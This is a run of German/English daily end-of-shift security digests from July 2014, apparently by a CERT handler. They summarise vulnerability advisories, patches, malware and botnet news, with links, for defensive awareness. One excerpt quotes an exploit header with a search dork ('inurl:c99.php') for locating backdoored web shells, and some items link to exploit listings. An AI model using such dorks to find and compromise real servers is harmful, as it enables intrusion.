======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 10-07-2014 18:00 − Freitag 11-07-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Finding the Clowns on the Syslog Carousel, (Thu, Jul 10th) *** --------------------------------------------- So often I see clients faithfully logging everything from the firewalls, routers and switches - taking terabytes of disk space to store it all. Sadly, the interaction after the logs are created is often simply to make sure that the partition doesnt fill up - either old logs are just deleted, or each month logs are burned to DVD and filed away. The comment I often get is that logs entries are complex, and that the sheer volume of information makes it impossible to make sense of it. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18373&rss *** Security Advisory 2982792 released, Certificate Trust List updated *** --------------------------------------------- Today, we are updating the Certificate Trust List (CTL) for all supported releases of Microsoft Windows to remove the trust of mis-issued third-party digital certificates. These certificates could be used to spoof content and perform phishing or man-in-the-middle attacks against web properties. With this update, most customers will be automatically protected against this issue and will not need to take any action. If you do not have automatic updates enabled, or if you are on Windows Server... --------------------------------------------- http://blogs.technet.com/b/msrc/archive/2014/07/10/security-advisory-298279… *** Weekly Metasploit Update: Another Meterpreter Evasion Option *** --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2014/07/10/weekly-me… *** Website Malware - Mobile Redirect to BaDoink Porn App *** --------------------------------------------- A few weeks ago we reported that we were seeing a huge increase in the number of web sites compromised with a hidden redirection to pornographic content. It was a very tricky injection, with the redirection happening only once per day per IP address and only if the visitor was using a mobile device... --------------------------------------------- http://feedproxy.google.com/~r/sucuri/blog/~3/pAisQqonxQM/website-malware-m… *** VU#712660: Raritian PX power distribution software is vulnerable to the cipher zero attack. *** --------------------------------------------- Vulnerability Note VU#712660 Raritian PX power distribution software is vulnerable to the cipher zero attack. Original Release date: 10 Jul 2014 | Last revised: 10 Jul 2014 Overview Raritan PX power distribution software version 01.05.08 and previous running on a model DPXR20A-16 device allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password. Description CWE-287: Improper Authentication - --------------------------------------------- http://www.kb.cert.org/vuls/id/712660 *** Oracle Critical Patch Update - July 2014 - Pre-Release Announcement *** --------------------------------------------- http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html *** Cisco ASA Filter and Inspect Overlap Denial of Service Vulnerability *** --------------------------------------------- CVE-2013-5567 --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013… *** Adobe Flash: The most INSECURE program on a UK users PC *** --------------------------------------------- XML a weak spot, but nothings as dire as Adobe player Adobe Flash Player was the most insecure program installed on UK computer users PCs throughout the second quarter of 2014, according to stats from vulnerability management firm Secunia. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/07/10/secunia_pc_… *** Crooks Seek Revival of "Gameover Zeus" Botnet *** --------------------------------------------- Cybercrooks today began taking steps to resurrect the Gameover ZeuS botnet, a complex crime machine that has been blamed for the theft more than $100 million from banks, businesses and consumers worldwide. The revival attempt comes roughly five weeks after the FBI joined several nations, researchers and security firms in a global and thus far successful effort to eradicate it. --------------------------------------------- http://feedproxy.google.com/~r/KrebsOnSecurity/~3/yLU9-y_8J-k/ *** VMSA-2014-0006.7 *** --------------------------------------------- VMware product updates address OpenSSL security vulnerabilities --------------------------------------------- http://www.vmware.com/security/advisories/VMSA-2014-0006.html *** DSA-2976 eglibc *** --------------------------------------------- security update --------------------------------------------- http://www.debian.org/security/2014/dsa-2976 *** osCommerce 2.3.4 - Multiple vulnerabilities *** --------------------------------------------- Topic: osCommerce 2.3.4 - Multiple vulnerabilities Risk: Medium Text:#Title: osCommerce 2.3.4 - Multiple vulnerabilities #Date: 10.07.14 #Affected versions: => 2.3.4 (latest atm) #Vendor: oscom... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014070059 *** C99 Shell Authentication Bypass via Backdoor *** --------------------------------------------- Topic: C99 Shell Authentication Bypass via Backdoor Risk: Medium Text:# Exploit Title: C99 Shell Authentication Bypass via Backdoor # Google Dork: inurl:c99.php # Date: June 23, 2014 # Exploit A... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014070057 *** Exploit emerges for LZO algo hole *** --------------------------------------------- Take one Nyan Cat, add Firefox and hope your Linux distro has been patched Security Mouse security researcher Don A Bailey has showcased an exploit of the Lempel-Ziv-Oberhumer (LZ0) compression algorithm running in the Mplayer2 media player and says it could leave some Linuxes vulnerable to attack. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/07/11/firefox_lzo… *** Microsoft entzieht Indischer CA das Vertrauen *** --------------------------------------------- Als Konsequenz auf die missbräuchlich ausgestellten Google-Zertifikate hat Microsoft die betroffenen SubCAs auf die Sperrliste gesetzt. Darüber hinaus wurde das ganze Ausmaß des Zwischenfalls bekannt: Betroffen sind 45 Domains - auch von Yahoo. --------------------------------------------- http://www.heise.de/security/meldung/Microsoft-entzieht-Indischer-CA-das-Ve… *** Lack of Certificate Pinning Exposes Encrypted iOS Gmail App Communication *** --------------------------------------------- Google has failed to implement certificate pinning in its official iOS Gmail application, which could enable Man-in-the-Middle attacks exposing encrypted user communications. --------------------------------------------- http://threatpost.com/lack-of-certificate-pinning-exposes-encrypted-ios-gma…

1 0

Tageszusammenfassung - Donnerstag 10-07-2014
by Daily end-of-shift report 10 Jul '14

10 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 09-07-2014 18:00 − Donnerstag 10-07-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** MSRT July 2014 - Caphaw *** --------------------------------------------- This month we added Win32/Caphaw and Win32/Bepush to the Malicious Software Removal Tool (MSRT). Caphaw is a malware family that can be used by criminals to gain access to your PC - the ultimate goal is to steal your financial or banking-related information. The graph below shows the number of machine encounters we have seen since September 2013. Figure 1: Caphaw encounters Caphaw can be installed on a PC via malicious links posted on Facebook, YouTube, and Skype. It can also spread through --------------------------------------------- http://blogs.technet.com/b/mmpc/archive/2014/07/08/msrt-july-2014-caphaw.as… *** International Authorities Take Down Shylock Banking Malware *** --------------------------------------------- Europol announced today that it, along with international law enforcement and industry partners, conducted a successful takedown of the infrastructure supporting the Shylock banking malware. --------------------------------------------- http://threatpost.com/international-authorities-take-down-shylock-banking-m… *** Certificate Errors in Office 365 Today, (Thu, Jul 10th) *** --------------------------------------------- It looks like theres a mis-assignment of certificates today at Office 365. After login, the redirect to portal.office.com reports the following error: portal.office.com uses an invalid security certificate. The certificate is only valid for the following names: *.bing.com, *.platform.bing.com, bing.com, ieonline.microsoft.com, *.windowssearch.com, cn.ieonline.microsoft.com, *.origin.bing.com, *.mm.bing.net, *.api.bing.com, ecn.dev.virtualearth.net, *.cn.bing.net, *.cn.bing.com, *.ssl.bing.com, --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18371&rss *** ZDI-14-224: (0Day) Embarcadero ER/Studio Data Architect TSVisualization ActiveX loadExtensionFactory Remote Code Execution Vulnerability *** --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Embarcadero ER/Studio Data Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-14-224/ *** SA-CONTRIB-2014-069 - Logintoboggan - Access Bypass and Cross Site Scripting (XSS) *** --------------------------------------------- Advisory ID: DRUPAL-SA-CONTRIB-2014-069Project: LoginToboggan (third-party module)Version: 7.xDate: 2014-July-09Security risk: Moderately criticalExploitable from: RemoteVulnerability: Cross Site Scripting, Access bypassDescriptionThis module enables you to customise the standard Drupal registration and login processes.Cross Site ScriptingThe module doesnt filter user-supplied information from the URL resulting in a reflected Cross Site Scripting (XSS) vulnerability.Access BypassThe module --------------------------------------------- https://www.drupal.org/node/2300369 *** Cisco WebEx Meetings Client Vulnerabilities *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Cisco Unified Communications Manager DNA Vulnerabilities *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products *** --------------------------------------------- cisco-sa-20140709-struts2 --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Infoblox NetMRI Input Validation Flaw Lets Remote Users Execute Arbitrary Code *** --------------------------------------------- http://www.securitytracker.com/id/1030541 *** [2014-07-10] Multiple critical vulnerabilities in Shopizer webshop *** --------------------------------------------- The webshop software Shopizer is affected by multiple critical vulnerabilities. Attackers are able to completely compromise the system through arbitrary code execution or manipulate product prices or customer data. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** [2014-07-10] Multiple high risk vulnerabilities in Shopizer webshop *** --------------------------------------------- The webshop software Shopizer is affected by multiple high risk vulnerabilities. Attackers are able to bypass authentication / authorization and access invoice data of other customers. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** [2014-07-10] Multiple critical vulnerabilites in Schrack MICROCONTROL emergency light system *** --------------------------------------------- Unauthenticated attackers are able to reconfigure the Schrack MICROCONTROL emergency light system by accessing the file system via telnet or FTP. Furthermore a weak default password can be exploited. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** [2014-07-10] Design Issue / Password Disclosure in WAGO-I/O-SYSTEM with CODESYS V2.3 WebVisu *** --------------------------------------------- The vulnerability in WAGO-I/O-SYSTEM with CODESYS V2.3 WebVisu enables an attacker to extract all the configured passwords without authentication. The attacker can use the extracted passwords to access the WebVisu and control the system. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** Vulnerability in Citrix XenDesktop could result in unauthorized access to another users desktop *** --------------------------------------------- Severity: High Description of Problem A vulnerability has been identified in Citrix XenDesktop that could result in a user gaining unauthorized interactive access to another user's desktop. --------------------------------------------- http://support.citrix.com/article/CTX139591 *** HPSBMU03070 rev.1 - HP Cloud Service Automation, OpenSSL Vulnerability, Unauthorized Access, Disclosure of Information *** --------------------------------------------- A potential security vulnerability has been identified with HP Cloud Service Automation. The vulnerability could be exploited to allow unauthorized access and disclosure of information. --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** HPSBMU03069 rev.1 - HP Software Operation Orchestration, OpenSSL Vulnerability, SSL/TLS, Remote Code Execution, Denial of Service (DoS), Disclosure of Information *** --------------------------------------------- Potential security vulnerabilities have been identified with HP Software Operation Orchestration. The vulnerabilities could be exploited to allow remote code execution, denial of service (DoS) and disclosure of information. --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** Vuln: PHP unserialize() Function Type Confusion Security Vulnerability *** --------------------------------------------- http://www.securityfocus.com/bid/68237

1 0

Tageszusammenfassung - Mittwoch 9-07-2014
by Daily end-of-shift report 09 Jul '14

09 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 08-07-2014 18:00 − Mittwoch 09-07-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** "Weaponized" exploit can steal sensitive user data on eBay, Tumblr, et al. *** --------------------------------------------- Google and Twitter already patched against potent "Rosetta Flash" attack. --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/B_J-82SKyS4/ *** Who owns your typo?, (Wed, Jul 9th) *** --------------------------------------------- Heres one way how to get at sensitive data that seems to be making a comeback. Already in the olden days, it was popular with the crooks to register domain names that only differed by a typo from the name of a legitimate high traffic site. Googl.com, for example. The crooks would then run web pages with lots of advertisements on these domains, and live happily ever after from the ad revenue that the misdirected typo traffic alone brought their way. Google put a stop to this by registering, for --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18363&rss *** Exploiting IoT technologies *** --------------------------------------------- How many Internet of Things (IoT) devices do you have? From smart TVs to coffee machines, these devices are becoming more and more popular in both homes and offices. A team of researchers at NCC Group, led by technical director, Paul Vlissidis, conducted research into a number of IoT devices and looked at some of the ways that an attacker could exploit them. The team, which also consisted of Pete Beck and Felix Ingram, principal consultants, conducted a live demonstration which explored the --------------------------------------------- https://www.nccgroup.com/en/blog/2014/07/exploiting-iot-technologies/ *** Who inherits your IP address?, (Wed, Jul 9th) *** --------------------------------------------- Somewhat similar to the typo squatting story earlier, the recent proliferation of cloud service usage by enterprises has led to a new problem. For a project at a community college, we needed a couple servers, and didnt want (or have the funds) to build them on-site. In view of the limited duration of the experiment, we decided to "rent" the boxes as IaaS (infrastructure as a service) devices from two "cloud" providers. So far, all went well. But when we brought the instances --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18365&rss *** Yahoo Patches Bugs in Mail, Messenger, Flickr *** --------------------------------------------- Yahoo recently fixed a trio of remotely exploitable vulnerabilities in its services that could have let attackers execute a handful of nefarious tricks. --------------------------------------------- http://threatpost.com/yahoo-fixes-trio-of-bugs-in-mail-messenger-flickr/107… *** Trojan:W32/Lecpetex: Bitcoin miner spreading via FB messages *** --------------------------------------------- In early March this year, while investigating various threats as part of our Facebook malware cleanup effort, we ran across an interesting one that was spreading in zipped files attached to messages.The messages themselves were classic social engineering bait that lead the users to install the executable file in the attachment, which turned out to be a Bitcoin miner, which we identify as Trojan:W32/Lecpetex. Some of the more interesting details of our analysis are presented in our Lecpetex --------------------------------------------- http://www.f-secure.com/weblog/archives/00002725.html *** Indien stellte falsche Google-Zertifikate aus *** --------------------------------------------- Erneut kam es zu einem schwerwiegenden Zwischenfall bei einem Herausgeber von SSL-Zertifikaten: Die staatlich betriebene CA von Indien hat unter anderem Zertifikate für Google-Dienste herausgegeben. Diese eignen sich zum Ausspähen von SSL-Traffic. --------------------------------------------- http://www.heise.de/security/meldung/Indien-stellte-falsche-Google-Zertifik… *** DPAPI vulnerability allows intruders to decrypt personal data *** --------------------------------------------- Passcape Software has discovered a DPAPI vulnerability that could potentially lead to unauthorized decryption of personal data and passwords of interactive domain users. The vulnerability is present in all Windows Server operating systems. --------------------------------------------- http://www.net-security.org/secworld.php?id=17094 *** ATTACK of the Windows ZOMBIES on point-of-sale terminals *** --------------------------------------------- Infosec bods infiltrate botnet, uncover crap password security Security watchers have spotted a fresh Windows-based botnet that attempts to hack into point-of-sale systems. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/07/09/botnet_brut… *** Security updates available for Adobe Flash Player (APSB14-17) *** --------------------------------------------- July 8, 2014 --------------------------------------------- http://blogs.adobe.com/psirt/?p=1108 *** MS14-JUL - Microsoft Security Bulletin Summary for July 2014 - Version: 1.0 *** --------------------------------------------- https://technet.microsoft.com/en-us/library/security/MS14-JUL *** Assessing risk for the July 2014 security updates *** --------------------------------------------- Today we released six security bulletins addressing 29 unique CVE's. Two bulletins have a maximum severity rating of Critical, three have maximum severity Important, and one is Moderate. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment. --------------------------------------------- http://blogs.technet.com/b/srd/archive/2014/07/08/assessing-risk-for-the-ju… *** VMSA-2014-0006.6 *** --------------------------------------------- VMware product updates address OpenSSL security vulnerabilities --------------------------------------------- http://www.vmware.com/security/advisories/VMSA-2014-0006.html *** Cisco Small Business SPA300 and SPA500 Series IP Phones Cross-Site Scripting Vulnerability *** --------------------------------------------- CVE-2014-3313 --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Yokogawa Centum Buffer Overflow Vulnerability *** --------------------------------------------- Advisory Document --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-189-01 *** DSA-2974 php5 *** --------------------------------------------- security update --------------------------------------------- http://www.debian.org/security/2014/dsa-2974 *** DSA-2973 vlc *** --------------------------------------------- security update --------------------------------------------- http://www.debian.org/security/2014/dsa-2973 *** HPSBMU03065 rev.1 - HP Operations Analytics, OpenSSL Vulnerability, SSL/TLS, Remote Code Execution, Denial of Service (DoS), Disclosure of Information *** --------------------------------------------- A potential security vulnerability has been identified with HP Operations Analytics. The vulnerability could be exploited to allow remote code execution, denial of service (DoS) and disclosure of information. --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** ABB Relion 650 Series OpenSSL Vulnerability (Update A) *** --------------------------------------------- Advisory Document --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-126-01A *** Cisco IOS Software and Cisco IOS XE Software NTP Access Group Vulnerability *** --------------------------------------------- CVE-2014-3309 --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Bugtraq: FreeBSD Security Advisory FreeBSD-SA-14:17.kmem *** --------------------------------------------- http://www.securityfocus.com/archive/1/532698 *** Juniper Security Bulletins *** --------------------------------------------- http://kb.juniper.net/index?page=content&id=JSA10634&actp=RSS http://kb.juniper.net/index?page=content&id=JSA10633&actp=RSS http://kb.juniper.net/index?page=content&id=JSA10638&actp=RSS http://kb.juniper.net/index?page=content&id=JSA10637&actp=RSS http://kb.juniper.net/index?page=content&id=JSA10641&actp=RSS http://kb.juniper.net/index?page=content&id=JSA10635&actp=RSS http://kb.juniper.net/index?page=content&id=JSA10613&actp=RSS http://kb.juniper.net/index?page=content&id=JSA10640&actp=RSS *** IBM Security Bulletin: IBM InfoSphere Guardium System x/Flex Systems appliances are affected by vulnerabilities in OpenSSL *** --------------------------------------------- IBM InfoSphere Guardium System x/Flex Systems appliances are affected by vulnerabilities in OpenSSL (CVE-2014-0224, CVE-2014-0221, CVE-2014-0195, CVE-2014-0198, CVE-2010-5298, CVE-2014-3470) Security vulnerabilities have been discovered in OpenSSL. CVE(s): CVE-2014-0224, CVE-2014-0221, CVE-2014-0195, CVE-2014-0198, CVE-2010-5298, CVE-2014-3470 and CVE-2014-5298 Affected product(s) and affected version(s): Hardware versions affected: InfoSphere Guardium Collector X1000 InfoSphere --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** IBM Security Bulletin: Rational Systems Tester is affected by Libxml2 vulnerability (CVE-2014-0191) *** --------------------------------------------- Denial-Of-service vulnerability has been discovered in Libxml2 that was reported on May 09, 2014 CVE(s): CVE-2014-0191 Affected product(s) and affected version(s): Rational Systems Tester 3.3, 3.3.0.1, 3.3.0.2, 3.3.0.3, 3.3.0.4, 3.3.0.5, 3.3.0.6, 3.3.0.7 Refer to the following reference URLs for remediation and additional vulnerability details: Source Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21678183 X-Force Database: http://xforce.iss.net/xforce/xfdb/93092 --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…

1 0

Tageszusammenfassung - Dienstag 8-07-2014
by Daily end-of-shift report 08 Jul '14

08 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 07-07-2014 18:00 − Dienstag 08-07-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Multi Platform *Coin Miner Attacking Routers on Port 32764, (Mon, Jul 7th) *** --------------------------------------------- Thanks to reader Gary for sending us in a sample of a *Coin miner that he found attacking Port 32764. Port 32764 was recently found to offer yet another backdoor on Sercomm equipped devices. We covered this backdoor before [1] The bot itself appears to be a variant of the "zollard" worm sean before by Symantec [2]. Symantecs writeup describes the worm as attacking a php-cgi vulnerability, not the Sercomm backdoor. But this worm has been seen using various exploits. Here some quick,... --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18353&rss *** When Adware Goes Bad: The Installbrain and Sefnit Connection *** --------------------------------------------- "Monetize On Non-buyers" is the bold motto of InstallBrain-adware that turns out to have been developed by an Israeli company called iBario Ltd. This motto clearly summarizes the potential risks adware companies can introduce to users, especially when they install stuff on... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/nRXcb4Udr5o/ *** IEEE expands malware initiatives *** --------------------------------------------- Clearing-house for software metadata Standards body the IEEE has launched two new anti-malware initiatives designed to help software and security vendors spot malware thats been inserted into other software, and improve the performance of malware detection by cutting down on false positives. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/07/08/ieee_expand… *** NTT Group 2014 Global Threat Intelligence Report *** --------------------------------------------- The NTT Group 2014 Global Threat Intelligence Report (GTIR) emphasizes that the security basics, when done right, can be enough to mitigate and even avoid high-profile, costly data breaches altogether. Using statistics and real-world case studies, the report shows that combining threat avoidance and threat response capabilities into a strategic approach provides the best chance to reduce the impact of threats. --------------------------------------------- http://www.solutionary.com/research/threat-reports/annual-threat-report/ntt… *** Paper: VBA is not dead! *** --------------------------------------------- Gabor Szappanos looks at the resurgence of malicious VBA macros that use social engineering to activate. --------------------------------------------- http://www.virusbtn.com/news/2014/07_07.xml?rss *** Android Vulnerability Allows Applications to Make Unauthorized Calls without Permissions *** --------------------------------------------- A major vulnerability believed to be present in most versions of Android can allow a malicious Android applications on the Android app store to make phone calls on a user's device, even when they lack the necessary permissions. The critical vulnerability was identified and reported to Google Inc. late last year by researchers from German security firm Curesec. The researchers believe the... --------------------------------------------- http://thehackernews.com/2014/07/android-vulnerability-allows.html *** Google Android / eduroam-Zugangsdaten *** --------------------------------------------- Bei mobilen Geräten mit Android-Betriebssystem ist die Default-Konfiguration für die Option CA-Zertifikat für WLAN-Verbindungen "keine Angabe". Konkret bedeutet dieses als normal dokumentierte Verhalten, dass die Prüfung der Zertifikatskette komplett deaktiviert ist, d.h. jedes beliebige Zertifikat wird ohne weitere Warnung akzeptiert. Erschwerend kommt hinzu,... --------------------------------------------- https://www.dfn-cert.de/aktuell/Google-Android-Eduroam-Zugangsdaten.html *** How not to tell your customers how much you care about their security *** --------------------------------------------- Weve written before about "what not to do" when sending emails to your customers. Heres another example, with an explanation of why doing the right thing will be better for everyone - including your marketing team! - in the long run. --------------------------------------------- http://nakedsecurity.sophos.com/2014/07/08/how-not-to-tell-your-customers-h… *** Metadaten gegen Viren-Fehlerkennugen *** --------------------------------------------- Die IEEE hat eine Datenbank für Metadaten von Binaries gestartet. Sie liefert Informationen, über die ein Virenscanner eindeutig feststellen kann, ob eine Datei gutartig ist. --------------------------------------------- http://www.heise.de/security/meldung/Metadaten-gegen-Viren-Fehlerkennugen-2… *** GKsu and VirtualBox Root Command Execution by Filename (CVE-2014-2943) *** --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2014/07/07/virtualbo… *** Bugtraq: Backdoor access to Techboard/Syac devices *** --------------------------------------------- http://www.securityfocus.com/archive/1/532665 *** [remote] - Oracle Event Processing FileUploadServlet Arbitrary File Upload *** --------------------------------------------- http://www.exploit-db.com/exploits/33989 *** Vuln: GitList CVE-2014-4511 Unspecified Remote Code Execution Vulnerability *** --------------------------------------------- http://www.securityfocus.com/bid/68253 *** Security Advisory-Apache Struts2 vulnerability on Huawei multiple products *** --------------------------------------------- Jul 07, 2014 21:09 --------------------------------------------- http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor… *** Apple iTunes 11.2.2 Insecure Libraries *** --------------------------------------------- Topic: Apple iTunes 11.2.2 Insecure Libraries Risk: High Text:Hi @ll, Apples current iTunes 11.2.2 for Windows comes with the following COMPLETELY outdated and vulnerable 3rd party libr... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014070042 *** Apache Syncope Insecure Password Generation *** --------------------------------------------- Topic: Apache Syncope Insecure Password Generation Risk: Medium Text:CVE-2014-3503: Insecure Random implementations used to generate passwords in Apache Syncope Severity: Major Vendor: The ... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014070039 *** Vuln: WordPress Easy Banners Plugin easy-banners.php Cross Site Scripting Vulnerability *** --------------------------------------------- http://www.securityfocus.com/bid/68281 *** Vuln: WordPress Custom Banners Plugin options.php Cross Site Scripting Vulnerability *** --------------------------------------------- http://www.securityfocus.com/bid/68279 *** TYPO3 CMS 4.5.35, 6.1.10 and 6.2.4 released *** --------------------------------------------- The TYPO3 Community announces the versions 4.5.35, 6.1.10 and 6.2.4 of the TYPO3 Enterprise Content Management System. All versions are maintenance releases and contain bug fixes. --------------------------------------------- https://typo3.org/news/article/typo3-cms-4535-6110-and-624-released/ *** HPSBGN03050 rev.1 - HP IceWall SSO Dfw and HP IceWall MCRP running OpenSSL, Remote Denial of Service (DoS), Code Execution, Security Restriction Bypass, Disclosure of Information, or Unauthorized Access *** --------------------------------------------- Potential security vulnerabilities have been identified with HP IceWall SSO Dfw and HP IceWall MCRP running OpenSSL. The vulnerabilities could be exploited remotely to create a Denial of Service (DoS), execute code, allow unauthorized access, or disclose information. --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…

1 0

Tageszusammenfassung - Montag 7-07-2014
by Daily end-of-shift report 07 Jul '14

07 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 04-07-2014 18:00 − Montag 07-07-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Self-signing custom Android ROMs *** --------------------------------------------- The security model on the Google Nexus devices is pretty straightforward. The OS is (nominally) secure and prevents anything from accessing the raw MTD devices. The bootloader will only allow the user to write to partitions if its unlocked. The recovery image will only permit you to install images that are signed with a trusted key. In combination, these facts mean that its impossible for an attacker to modify the OS image without unlocking the bootloader[1], and unlocking the bootloader wipes --------------------------------------------- http://mjg59.dreamwidth.org/31765.html *** Java Support ends for Windows XP, (Sat, Jul 5th) *** --------------------------------------------- Oracle is no longer supporting Java for Windows XP and will only support Windows Vista or later. Java 8 is not supported for Windows XP and users will be unable to install on their systems. Oracle warns "Users may still continue to use Java 7 updates on Windows XP at their own risk" [1] [1] https://www.java.com/en/download/faq/winxp.xml [2] http://www.oracle.com/us/support/library/057419.pdfhttps://www.java.com/en/… ----------- Guy Bruneau IPSS Inc. gbruneau at --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18345&rss *** Critical Vulnerability and Privacy LoopHole Found in RoboForm Password Manager *** --------------------------------------------- Unless you are a human supercomputer, remembering password is not so easy, and that too if you have a different password for each site. But luckily to make the whole process very easy, there is a growing market out there for password managers and lockers with extra layers of security. But, if you are using the mobile version of most popular password manager from Password management company --------------------------------------------- http://feedproxy.google.com/~r/TheHackersNews/~3/Ajpf8i6yTao/critical-vulne… *** Zwei Patches schließen SQL-Injection-Lücken in Ruby on Rails *** --------------------------------------------- Zwei recht ähnliche Lücken erlaubten SQL-Injections auf Websites, die auf Ruby on Rails 2.0.0 bis 3.1.18 sowie auf 4.x aufsetzen. In mehreren Anläufen haben die Rails-Entwickler die Lücken nun geschlossen. --------------------------------------------- http://www.heise.de/newsticker/meldung/Zwei-Patches-schliessen-SQL-Injectio… *** Malware Analysis with pedump, (Sat, Jul 5th) *** --------------------------------------------- Are you looking for a tool to analyze Windows Portable Executable (PE) files? Consider using pedump a ruby win32 PE binary file analyzer. It currently support DOS MZ EXE, win16 NE and win32/64 PE. There are several ways to install the ruby package; however, the simplest way is to execute "gem install pedump" from a Linux workstation. You can also download the file here or use the pedump website to upload your file for analysis. This example shows the output from the pedump website. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18347&rss *** Industrial Control System Firms In Dragonfly Attack Identified *** --------------------------------------------- chicksdaddy (814965) writes Two of the three industrial control system (ICS) software companies that were victims of the so-called "Dragonfly" malware have been identified. ... Dale Peterson of the firm Digitalbond identified the vendors as MB Connect Line, a German maker of industrial routers and remote access appliances and eWon, a Belgian firm that makes virtual private network (VPN) software that is used to access industrial control devices like programmable logic controllers. --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/Jr0QiFtg7lc/story01.htm *** Coinbase wallet app in SSL/TLS SNAFU *** --------------------------------------------- The popular Bitcoin wallet Coinbase has a security flaw in its Android apps which could allow an attacker to steal authentication codes and access users accounts, according to a security researcher. Coinbase is far from alone in leaving its wallet app users vulnerable, so what should you do to stay safe when using mobile banking apps? --------------------------------------------- http://feedproxy.google.com/~r/nakedsecurity/~3/GsgGIYu7TA0/ *** The Rise of Thin, Mini and Insert Skimmers *** --------------------------------------------- Like most electronic gadgets these days, ATM skimmers are getting smaller and thinner, with extended battery life. Heres a look at several miniaturized fraud devices that were pulled from compromised cash machines at various ATMs in Europe so far this year. --------------------------------------------- http://feedproxy.google.com/~r/KrebsOnSecurity/~3/8s5hQ323oMY/ *** Fridge hacked. Car hacked. Next up, your LIGHT BULBS *** --------------------------------------------- So shall you languish in darkness - or under disco-style strobes - FOREVER Those convinced that the emerging Internet of Things (IoT) will become a hackers playground were given more grist for their mill with news on Friday that security researchers have discovered a weakness in Wi-Fi/mesh networked lightbulbs. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/07/07/wifi_enable… *** Anwälte: Falsche Filesharing-Abmahnung verbreitet massenhaft Malware *** --------------------------------------------- Zwei bekannte Anwälte warnen vor gefälschten Abmahnungen wegen illegalen Musikdownloads. An den massenhaft verschickten E-Mails hängt eine Zip-Datei mit Schadcode. --------------------------------------------- http://www.golem.de/news/anwaelte-falsche-filesharing-abmahnung-verbreitet-… *** IBM Security Bulletin: Multiple vulnerabilities exist in IMS Enterprise Suite SOAP Gateway (CVE-2014-0453, CVE-2013-4286, CVE-2013-4322) *** --------------------------------------------- The IMS Enterprise Suite SOAP Gateway is affected by multiple vulnerabilities in IBM SDK, Java Technology Edition (April Update) and Apache Tomcat. CVE(s): CVE-2014-0453, CVE-2013-4286 and CVE-2013-4322 Affected product(s) and affected version(s): CVE ID: CVE-2014-0453 The SOAP Gateway component of the IMS Enterprise Suite versions 2.1, 2.2, 3.1. CVE ID: CVE-2013-4286 CVE ID: CVE-2013-4322 The SOAP Gateway component of the IMS Enterprise Suite versions 2.2, 